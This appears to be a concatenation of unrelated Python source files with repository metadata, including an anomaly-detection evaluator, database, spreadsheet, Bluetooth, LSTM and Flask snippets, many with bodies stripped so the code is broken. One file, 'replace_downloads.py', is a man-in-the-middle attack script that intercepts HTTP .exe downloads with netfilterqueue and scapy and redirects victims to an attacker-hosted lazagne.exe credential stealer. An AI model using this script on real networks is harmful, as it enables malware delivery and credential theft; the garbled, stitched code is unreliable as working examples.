y_pred[file_idx] = mseloss.item()
# store anomaly scores
anomaly_score_list.append([os.path.basename(file_path), y_pred[file_idx]])
# store decision results
if y_pred[file_idx] > decision_threshold:
decision_result_list.append([os.path.basename(file_path), 1])
else:
decision_result_list.append([os.path.basename(file_path), 0])
# output anomaly scores
save_csv(save_file_path=anomaly_score_csv, save_data=anomaly_score_list)
com.logger.info("anomaly score result -> {}".format(anomaly_score_csv))
# output decision results
save_csv(save_file_path=decision_result_csv, save_data=decision_result_list)
com.logger.info("decision result -> {}".format(decision_result_csv))
if mode:
# append AUC and pAUC to lists
auc = metrics.roc_auc_score(y_true, y_pred)
p_auc = metrics.roc_auc_score(y_true, y_pred, max_fpr=param["max_fpr"])
tn, fp, fn, tp = metrics.confusion_matrix(y_true, [1 if x > decision_threshold else 0 for x in y_pred]).ravel()
prec = tp / np.maximum(tp + fp, sys.float_info.epsilon)
recall = tp / np.maximum(tp + fn, sys.float_info.epsilon)
f1 = 2.0 * prec * recall / np.maximum(prec + recall, sys.float_info.epsilon)
csv_lines.append([section_name.split("_", 1)[1], dir_name.split("_", 1)[0], auc, p_auc, prec, recall, f1])
performance.append([auc, p_auc, prec, recall, f1])
performance_over_all.append([auc, p_auc, prec, recall, f1])
com.logger.info("AUC : {}".format(auc))
com.logger.info("pAUC : {}".format(p_auc))
com.logger.info("precision : {}".format(prec))
com.logger.info("recall : {}".format(recall))
com.logger.info("F1 score : {}".format(f1))
print("\n============ END OF TEST FOR A SECTION ============")
if mode:
# calculate averages for AUCs and pAUCs
amean_performance = np.mean(np.array(performance, dtype=float), axis=0)
csv_lines.append(["arithmetic mean", ""] + list(amean_performance))
hmean_performance = scipy.stats.hmean(np.maximum(np.array(performance, dtype=float), sys.float_info.epsilon), axis=0)
csv_lines.append(["harmonic mean", ""] + list(hmean_performance))
csv_lines.append([])
del data
del model
if mode:
csv_lines.append(["", "", "AUC", "pAUC", "precision", "recall", "F1 score"])
# calculate averages for AUCs and pAUCs
amean_performance = np.mean(np.array(performance_over_all, dtype=float), axis=0)
csv_lines.append(["arithmetic mean over all machine types, sections, and domains", ""] + list(amean_performance))
hmean_performance = scipy.stats.hmean(np.maximum(np.array(performance_over_all, dtype=float), sys.float_info.epsilon), axis=0)
csv_lines.append(["harmonic mean over all machine types, sections, and domains", ""] + list(hmean_performance))
csv_lines.append([])
# output results
result_path = "{result}/{file_name}".format(result=param["result_directory"], file_name=param["result_file"])
com.logger.info("results -> {}".format(result_path))
save_csv(save_file_path=result_path, save_data=csv_lines)
| 50.308036 | 151 | 0.460112 |
4690da1c3b97e01a8795122d75752b424704a346 | 1,706 | py | Python | Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | null | null | null | Replace Downloads/replace_downloads.py | crake7/Defensor-Fortis- | 086b055a10b9ac55f444e8d13b4031f998415438 | [
"MIT"
] | 1 | 2021-12-20T11:44:51.000Z | 2021-12-20T11:44:51.000Z | #!/usr/bin/env python
import netfilterqueue
import scapy.all as scapy
ack_list = []
def process_packet(packet):
"""Modify downloads files on the fly while target uses HTTP/HTTPS.
Do not forget to choose the port you will be using in line 22/29.
Do not forget to modify line 24 and 35 and uncomment them afterwards."""
scapy_packet = scapy.IP (packet.get_payload())
if scapy_packet.haslayer(scapy.Raw):
if scapy_packet[scapy.TCP].dport == #CHOOSE PORT HERE: 80 / 10000:
# print("HTTP Request")
if ".exe" in scapy_packet[scapy.Raw].load and #Input IP of your web server here: "10.0.2.15" not in scapy_packet[scapy.Raw].load:
print("Captured .exe file in the Request packet.")
ack_list.append(scapy_packet[scapy.TCP].ack)
# print(scapy_packet.show())
elif scapy_packet[scapy.TCP].sport ==#CHOOSE PORT HERE: 80 / 10000:
# print("HTTP Response")
if scapy_packet[scapy.TCP].seq in ack_list:
ack_list.remove(scapy_packet[scapy.TCP].seq)
print("Replacing the file.")
# print(scapy_packet.show())
modified_packet = set_load(scapy_packet, #Input the full path of your executable here: "HTTP/1.1 301 Moved Permanently\nLocation: http://10.0.2.15/Evil%20Files/lazagne.exe\n\n")
packet.set_payload(str(modified_packet))
packet.accept()
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packet)
queue.run()
| 37.086957 | 193 | 0.654162 |
46917396382ee9f0addf54bb780182338681e694 | 1,757 | py | Python | tmpmodels.py | firaan1/iamgrateful | 445260313ab94dfdaf310a6766e848c8df94b624 | [
"MIT"
] | null | null | null | tmpmodels.py | firaan1/iamgrateful | 445260313ab94dfdaf310a6766e848c8df94b624 | [
"MIT"
] | null | null | null | tmpmodels.py | firaan1/iamgrateful | 445260313ab94dfdaf310a6766e848c8df94b624 | [
"MIT"
] | null | null | null | from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import create_engine
from sqlalchemy import Column, Integer, String, Text, ForeignKey, DateTime, func, Boolean
from sqlalchemy.orm import relation, sessionmaker, relationship, backref
from datetime import datetime
import os
# Database
DATABASE = 'sqlite:///db.sqlite3'
DEBUG = True
# ORM
Base = declarative_base()
# model
# if __name__ == '__main__':
# connection
engine = create_engine(DATABASE, echo = DEBUG)
session_factory = sessionmaker(bind = engine)
session = session_factory()
# initialize database
if not os.path.exists('db.sqlite3'):
Base.metadata.create_all(engine)
| 30.824561 | 89 | 0.712009 |
4691f105e7b4e6d56ef7ec3a85a8060f44a867c1 | 579 | py | Python | doc/filters.py | CargobaseDev/openpyxl | 782ba90d26be452379fc06f45227e12bca9bade4 | [
"MIT"
] | 6 | 2018-05-15T05:08:52.000Z | 2021-12-23T12:31:28.000Z | doc/filters.py | CargobaseDev/openpyxl | 782ba90d26be452379fc06f45227e12bca9bade4 | [
"MIT"
] | 1 | 2022-01-01T15:08:26.000Z | 2022-01-01T15:08:36.000Z | doc/filters.py | CargobaseDev/openpyxl | 782ba90d26be452379fc06f45227e12bca9bade4 | [
"MIT"
] | 6 | 2020-03-23T15:59:14.000Z | 2021-09-18T09:54:57.000Z | from openpyxl import Workbook
wb = Workbook()
ws = wb.active
data = [
["Fruit", "Quantity"],
["Kiwi", 3],
["Grape", 15],
["Apple", 3],
["Peach", 3],
["Pomegranate", 3],
["Pear", 3],
["Tangerine", 3],
["Blueberry", 3],
["Mango", 3],
["Watermelon", 3],
["Blackberry", 3],
["Orange", 3],
["Raspberry", 3],
["Banana", 3]
]
for r in data:
ws.append(r)
ws.auto_filter.ref = "A1:B15"
ws.auto_filter.add_filter_column(0, ["Kiwi", "Apple", "Mango"])
ws.auto_filter.add_sort_condition("B2:B15")
wb.save("filtered.xlsx")
| 18.09375 | 63 | 0.544041 |
4692314ed6b0b1046dcbfa825a3d464141899b16 | 1,150 | py | Python | Bleak/two_devices.py | mbdev2/MIS_FindMyProfessor | fa6a8e9b787013b2eadbc021b0d74210de689872 | [
"MIT"
] | null | null | null | Bleak/two_devices.py | mbdev2/MIS_FindMyProfessor | fa6a8e9b787013b2eadbc021b0d74210de689872 | [
"MIT"
] | null | null | null | Bleak/two_devices.py | mbdev2/MIS_FindMyProfessor | fa6a8e9b787013b2eadbc021b0d74210de689872 | [
"MIT"
] | null | null | null | from bleak import BleakClient
import asyncio
import functools
notify_uuid = "00002a19-0000-1000-8000-00805f9b34fb".format(0x2A19)
if __name__ == "__main__":
run(
["96E8409A-F2EB-4029-B3DC-615FADE0C838","D31CB0CA-890E-476B-80D9-80ED8A3AA69A"]
)
| 27.380952 | 100 | 0.691304 |
4692c2ff5367cf7fc52d9c66cbd5187236f80e7d | 655 | py | Python | binary search tree insertion.py | buhuhaha/python | 4ff72ac711f0948ae5bcb0886d68e8df77fe515b | [
"MIT"
] | null | null | null | binary search tree insertion.py | buhuhaha/python | 4ff72ac711f0948ae5bcb0886d68e8df77fe515b | [
"MIT"
] | null | null | null | binary search tree insertion.py | buhuhaha/python | 4ff72ac711f0948ae5bcb0886d68e8df77fe515b | [
"MIT"
] | null | null | null | if __name__ == '__main__':
keys = [15, 10, 20, 8, 12, 16, 25]
root = constructBST(keys)
inorder(root) | 22.586207 | 44 | 0.58626 |
469393ea6c4b1c5c7b78ca579da1a18fef848cb3 | 625 | py | Python | tests/test_env_helpers.py | Azraeht/py-ndebug | b7d13b39adc6c0ece6b0d527752869fd94eb9f8a | [
"MIT"
] | null | null | null | tests/test_env_helpers.py | Azraeht/py-ndebug | b7d13b39adc6c0ece6b0d527752869fd94eb9f8a | [
"MIT"
] | 1 | 2020-03-24T17:29:40.000Z | 2020-03-24T17:29:40.000Z | tests/test_env_helpers.py | Azraeht/py-ndebug | b7d13b39adc6c0ece6b0d527752869fd94eb9f8a | [
"MIT"
] | 1 | 2020-03-24T16:41:31.000Z | 2020-03-24T16:41:31.000Z | from ndebug import env_helpers
| 31.25 | 91 | 0.5536 |
4693fb42192c5502c57c49f8441c5cf7ba66b002 | 1,709 | py | Python | relay_lib_seeed_test_2.py | johnwargo/seeed-studio-relay-v2 | ce1b84b0f0001baa7ec4729dc2967531da3bdc22 | [
"MIT"
] | 1 | 2021-05-07T07:40:27.000Z | 2021-05-07T07:40:27.000Z | relay_lib_seeed_test_2.py | johnwargo/seeed-studio-relay-v2 | ce1b84b0f0001baa7ec4729dc2967531da3bdc22 | [
"MIT"
] | null | null | null | relay_lib_seeed_test_2.py | johnwargo/seeed-studio-relay-v2 | ce1b84b0f0001baa7ec4729dc2967531da3bdc22 | [
"MIT"
] | null | null | null | #!/usr/bin/python
'''*****************************************************************************************************************
Seeed Studio Relay Board Library V2
Test Application #2
By John M. Wargo (https://www.johnwargo.com)
********************************************************************************************************************'''
import sys
import time
from seeed_relay_v1 import Relay
# Now see what we're supposed to do next
if __name__ == "__main__":
# Create the relay object
relay = Relay()
try:
process_loop()
except KeyboardInterrupt:
print("\nExiting application")
# turn off all of the relays
relay.all_off()
# exit the application
sys.exit(0)
| 26.703125 | 119 | 0.504389 |
469452474a032213255cf5547c78a4dee27d7d79 | 2,087 | py | Python | quasar/sa_database.py | stevencyrway/quasar | db8ff733ec1becf95defc7097890232cd5944d48 | [
"MIT"
] | 12 | 2017-05-17T17:22:47.000Z | 2021-05-24T17:24:42.000Z | quasar/sa_database.py | stevencyrway/quasar | db8ff733ec1becf95defc7097890232cd5944d48 | [
"MIT"
] | 484 | 2015-12-02T19:24:34.000Z | 2022-02-22T16:36:47.000Z | quasar/sa_database.py | stevencyrway/quasar | db8ff733ec1becf95defc7097890232cd5944d48 | [
"MIT"
] | 8 | 2017-04-27T20:42:05.000Z | 2022-01-11T19:43:57.000Z | import os
from sqlalchemy import bindparam, create_engine, exc
from sqlalchemy.dialects.postgresql.json import JSONB
from sqlalchemy.engine.url import URL
from sqlalchemy.sql import text
from .utils import log, logerr
# Setup SQL Alchemy vars.
pg_opts = {
'drivername': os.getenv('PG_DRIVER'),
'username': os.getenv('PG_USER'),
'password': os.getenv('PG_PASSWORD'),
'host': os.getenv('PG_HOST'),
'port': os.getenv('PG_PORT'),
'database': os.getenv('PG_DATABASE')
}
pg_ssl = os.getenv('PG_SSL')
| 32.107692 | 75 | 0.632966 |
4694573c6edf0ff0ed4f4786ad3fb6ae431575db | 29,122 | py | Python | commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 6ed002c7df856d95d8cb2b8e5346c2bb807bf4bc | [
"MIT"
] | 1 | 2020-06-13T13:57:11.000Z | 2020-06-13T13:57:11.000Z | commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 6ed002c7df856d95d8cb2b8e5346c2bb807bf4bc | [
"MIT"
] | null | null | null | commands/__init__.py | CorneliaXaos/Command-Block-Assembly | 6ed002c7df856d95d8cb2b8e5346c2bb807bf4bc | [
"MIT"
] | null | null | null | import abc
def make_selector(selector, **kwargs):
output = '@' + selector
if not kwargs:
return output
return '%s[%s]' % (output, str_pairs(kwargs.items()))
GlobalEntity = _GlobalEntity()
PosUtil = _PosUtil()
def StackFrame(index):
return StackFramePath
StackFrameHead = StackFrame(0)
def ensure_selector(sel_arg):
assert isinstance(sel_arg, EntityRef), sel_arg
return sel_arg
UtilBlockPos = _UtilBlockPos(False)
ZeroTickBlockPos = _UtilBlockPos(True)
| 29.327291 | 86 | 0.588215 |
46950a30a497c84732798b48f44483d04a01233a | 217 | py | Python | top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py | ClearlightY/Python_learn | 93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232 | [
"Apache-2.0"
] | 1 | 2020-01-16T09:23:43.000Z | 2020-01-16T09:23:43.000Z | top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py | ClearlightY/Python_learn | 93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232 | [
"Apache-2.0"
] | null | null | null | top/clearlight/reptile/bilibili/bj_tech_mooc/example_04_360.py | ClearlightY/Python_learn | 93b9b7efae5a1cf05faf8ee7c5e36dcc99c7a232 | [
"Apache-2.0"
] | null | null | null | import requests
keyword = "python"
try:
kv = {'q':keyword}
r = requests.get('http://www.so.com/s', params=kv)
print(r.request.url)
r.raise_for_status()
print(len(r.text))
except:
print('') | 19.727273 | 54 | 0.617512 |
4695279b1ca8306d24c6c58add7de32e6798011f | 4,489 | py | Python | rodnet/models/backbones/cdc_deep.py | zhengzangw/RODNet | eca5f2bd1f3051c2b823d279532ddafa71b009c1 | [
"MIT"
] | null | null | null | rodnet/models/backbones/cdc_deep.py | zhengzangw/RODNet | eca5f2bd1f3051c2b823d279532ddafa71b009c1 | [
"MIT"
] | null | null | null | rodnet/models/backbones/cdc_deep.py | zhengzangw/RODNet | eca5f2bd1f3051c2b823d279532ddafa71b009c1 | [
"MIT"
] | null | null | null | import torch.nn as nn
| 32.294964 | 101 | 0.461573 |
46955a61d6eda18fd04e0a7384414c8a588922bf | 85 | py | Python | File/admin.py | alstn2468/Likelion_DRF_Project | 35a359a05185f551ed2e999ab17e0108a69d6b57 | [
"MIT"
] | 28 | 2019-10-15T13:15:26.000Z | 2021-11-08T08:23:45.000Z | 15_LikeLionDRFProject/File/admin.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 1 | 2021-05-22T18:27:01.000Z | 2021-05-22T18:27:01.000Z | 15_LikeLionDRFProject/File/admin.py | jhleed/LikeLion_Django_Study_Summary | c788182af5bcfd16bdd4b57235a48659758e494b | [
"MIT"
] | 17 | 2019-09-09T00:15:36.000Z | 2021-01-28T13:08:51.000Z | from django.contrib import admin
from .models import File
admin.site.register(File)
| 17 | 32 | 0.811765 |
469862e42b088f23b41b49c8734db4c50395bddc | 28,022 | py | Python | agent/windows/agent.py | fortinet/ips-bph-framework | 145e14cced2181f388ade07d78b4f0e9452143dd | [
"Apache-2.0"
] | 21 | 2019-10-24T04:59:52.000Z | 2021-05-11T12:47:17.000Z | agent/windows/agent.py | fortinet/ips-bph-framework | 145e14cced2181f388ade07d78b4f0e9452143dd | [
"Apache-2.0"
] | null | null | null | agent/windows/agent.py | fortinet/ips-bph-framework | 145e14cced2181f388ade07d78b4f0e9452143dd | [
"Apache-2.0"
] | 9 | 2019-10-26T16:56:08.000Z | 2021-03-15T14:10:21.000Z | import shutil
import socket
import subprocess
import threading
import json
import pickle
import tempfile
import time
import box
import threading
import os
import base64
import getpass
import urllib
import requests
import zipfile
import sys
import pprint
import platform
DEBUG = True
BPH_TEMPLATE_SERVER_IP = sys.argv[1]
BPH_TEMPLATE_SERVER_PORT = int(sys.argv[2])
BPH_CONTROLLER_WEB_PORT = int(sys.argv[3])
running_os = platform.release()
if running_os == "7":
APP_DATA = "C:\\Users\\{current_user}\\AppData\\Roaming\\".format(
current_user=getpass.getuser())
TMP_FOLDER = "C:\\Users\\{current_user}\\AppData\\Local\\Temp\\".format(
current_user=getpass.getuser())
elif running_os == "XP":
# To avoid tool issues when dealing with white-spaced paths.
APP_DATA = "C:\\DOCUME~1\\{current_user}\\APPLIC~1\\".format(
current_user=getpass.getuser())
TMP_FOLDER = "C:\\DOCUME~1\\{current_user}\\LOCALS~1\\Temp\\".format(
current_user=getpass.getuser())
else:
print "Unsupported platform! Exiting..."
sys.exit()
if __name__ == "__main__":
agent = Agent()
try:
agent.start()
while True:
# agent.check_connection()
if not agent.is_connected():
# If agent stops. Start it again.
agent.start()
except KeyboardInterrupt:
print "Manual interruption. Bye!"
sys.exit()
| 40.552822 | 126 | 0.554386 |
469870ae47593eb387aa34d03ce486676acb3094 | 2,599 | py | Python | python/src/learn/lstmSequence.py | kakaba2009/MachineLearning | 26b389f8ffb5f3af939dfc9ebfdf2c6b2fc2ae33 | [
"Apache-2.0"
] | null | null | null | python/src/learn/lstmSequence.py | kakaba2009/MachineLearning | 26b389f8ffb5f3af939dfc9ebfdf2c6b2fc2ae33 | [
"Apache-2.0"
] | null | null | null | python/src/learn/lstmSequence.py | kakaba2009/MachineLearning | 26b389f8ffb5f3af939dfc9ebfdf2c6b2fc2ae33 | [
"Apache-2.0"
] | null | null | null | # LSTM with Variable Length Input Sequences to One Character Output
import numpy
from keras.models import Sequential
from keras.layers import Dense
from keras.layers import LSTM
from keras.utils import np_utils
from keras.preprocessing.sequence import pad_sequences
from theano.tensor.shared_randomstreams import RandomStreams
# fix random seed for reproducibility
numpy.random.seed(7)
# define the raw dataset
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
# create mapping of characters to integers (0-25) and the reverse
char_to_int = dict((c, i) for i, c in enumerate(alphabet))
int_to_char = dict((i, c) for i, c in enumerate(alphabet))
# prepare the dataset of input to output pairs encoded as integers
num_inputs = 16
max_len = 5
dataX = []
dataY = []
for i in range(num_inputs):
start = numpy.random.randint(len(alphabet)-2)
end = numpy.random.randint(start, min(start+max_len,len(alphabet)-1))
sequence_in = alphabet[start:end+1]
sequence_out = alphabet[end + 1]
dataX.append([char_to_int[char] for char in sequence_in])
dataY.append(char_to_int[sequence_out])
print( sequence_in, '->', sequence_out )
# convert list of lists to array and pad sequences if needed
X = pad_sequences(dataX, maxlen=max_len, dtype='float32')
# reshape X to be [samples, time steps, features]
X = numpy.reshape(X, (X.shape[0], max_len, 1))
# normalize
X = X / float(len(alphabet))
# one hot encode the output variable
y = np_utils.to_categorical(dataY)
# create and fit the model
batch_size = 1
model = Sequential()
model.add(LSTM(16, batch_input_shape=(batch_size, X.shape[1], X.shape[2]), stateful=True))
model.add(Dense(y.shape[1], activation='softmax'))
model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
for i in range(1):
model.fit(X, y, nb_epoch=1, batch_size=batch_size, verbose=2, shuffle=False)
model.reset_states()
# summarize performance of the model
scores = model.evaluate(X, y, batch_size=batch_size, verbose=0)
model.reset_states()
print("Model Accuracy: %.2f%%" % (scores[1]*100))
# demonstrate some model predictions
for i in range(1):
pattern_index = numpy.random.randint(len(dataX))
pattern = dataX[pattern_index]
x = pad_sequences([pattern], maxlen=max_len, dtype='float32')
x = numpy.reshape(x, (1, max_len, 1))
x = x / float(len(alphabet))
prediction = model.predict(x, verbose=0)
index = numpy.argmax(prediction)
result = int_to_char[index]
seq_in = [int_to_char[value] for value in pattern]
print( seq_in, "->", result )
| 41.919355 | 91 | 0.719123 |
4699a0bfa6dd1ddc3a1e8897780df54022543382 | 8,541 | py | Python | DATA/prediction/direction/pred_script.py | korcsmarosgroup/ARN2DataBase | 8931cec0387e5c8b599df40d652ac5fdb5c49a8f | [
"MIT"
] | null | null | null | DATA/prediction/direction/pred_script.py | korcsmarosgroup/ARN2DataBase | 8931cec0387e5c8b599df40d652ac5fdb5c49a8f | [
"MIT"
] | null | null | null | DATA/prediction/direction/pred_script.py | korcsmarosgroup/ARN2DataBase | 8931cec0387e5c8b599df40d652ac5fdb5c49a8f | [
"MIT"
] | null | null | null | """
Direction prediction based on learning dataset from reactome
PPI direction calculated from domain interaction directions
"""
# Imports
import sqlite3, csv, os
import pandas as pd
import logging
import pickle
# # Initiating logger
# logger = logging.getLogger()
# handler = logging.FileHandler('../../workflow/SLK3.log')
# logger.setLevel(logging.DEBUG)
# handler.setLevel(logging.DEBUG)
# formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
# handler.setFormatter(formatter)
# logger.addHandler(handler)
if __name__ == '__main__':
test = DirScore()
logger.debug('Creating test set')
test.test_scores()
logger.debug('Adding scores to dataset')
test.apply_to_db()
logger.debug('Direction prediction done')
| 45.673797 | 125 | 0.550872 |
4699a1827567dd51a8a50f85f10e57138d48a545 | 1,398 | py | Python | src/main.py | vcodrins/json_to_folder | 3e07259b1c5757587a5235b2412441d87607597f | [
"MIT"
] | null | null | null | src/main.py | vcodrins/json_to_folder | 3e07259b1c5757587a5235b2412441d87607597f | [
"MIT"
] | null | null | null | src/main.py | vcodrins/json_to_folder | 3e07259b1c5757587a5235b2412441d87607597f | [
"MIT"
] | null | null | null | import json
import os.path
import sys
from exceptions import *
from create_folder_structure import create_folder_structure
main()
| 26.884615 | 96 | 0.556509 |
469a1ea0ba86db2759c0a614f1ca8112b547ba08 | 277 | py | Python | app/conftest.py | hbyyy/newsmailing | 53f7bbff438a5dcd19708dc8738d4407d156dd7f | [
"MIT"
] | null | null | null | app/conftest.py | hbyyy/newsmailing | 53f7bbff438a5dcd19708dc8738d4407d156dd7f | [
"MIT"
] | 7 | 2020-06-19T15:32:07.000Z | 2021-08-23T20:49:39.000Z | app/conftest.py | hbyyy/newsmailing | 53f7bbff438a5dcd19708dc8738d4407d156dd7f | [
"MIT"
] | null | null | null | from datetime import timedelta
import pytest
from model_bakery import baker
| 19.785714 | 41 | 0.693141 |
469ba49461fc882de80bb1d478b0aec8c3c11361 | 3,952 | py | Python | src/SecurityDecorator.py | JanCwik/SoftwarePraktikum | d4a2b196f21a5379188cb78b31c59d69f739964f | [
"RSA-MD"
] | 7 | 2020-05-18T14:20:17.000Z | 2020-07-27T17:37:38.000Z | src/SecurityDecorator.py | JanCwik/SoftwarePraktikum | d4a2b196f21a5379188cb78b31c59d69f739964f | [
"RSA-MD"
] | null | null | null | src/SecurityDecorator.py | JanCwik/SoftwarePraktikum | d4a2b196f21a5379188cb78b31c59d69f739964f | [
"RSA-MD"
] | 2 | 2020-05-18T14:20:22.000Z | 2020-07-27T17:37:05.000Z | from flask import request
from google.auth.transport import requests
import google.oauth2.id_token
from server.ApplikationsAdministration import ApplikationsAdministration
#Benutzer.py, BenutzerMapper + BenutzerMethoden in ApplikationsAdministration
def secured(function):
"""Decorator zur Google Firebase-basierten Authentifizierung von Benutzern
Da es sich bei diesem System um eine basale Fallstudie zu Lehrzwecken handelt, wurde hier
bewusst auf ein ausgefeiltes Berechtigungskonzept verzichtet. Vielmehr soll dieses Decorator
einen Weg aufzeigen, wie man technisch mit vertretbarem Aufwand in eine Authentifizierung
einsteigen kann.
POLICY: Die hier demonstrierte Policy ist, dass jeder, der einen durch Firebase akzeptierten
Account besitzt, sich an diesem System anmelden kann. Bei jeder Anmeldung werden Klarname,
Mail-Adresse sowie die Google User ID in unserem System gespeichert bzw. geupdated. Auf diese
Weise knnte dann fr eine Erweiterung des Systems auf jene Daten zurckgegriffen werden.
"""
firebase_request_adapter = requests.Request()
return wrapper
| 45.953488 | 97 | 0.603492 |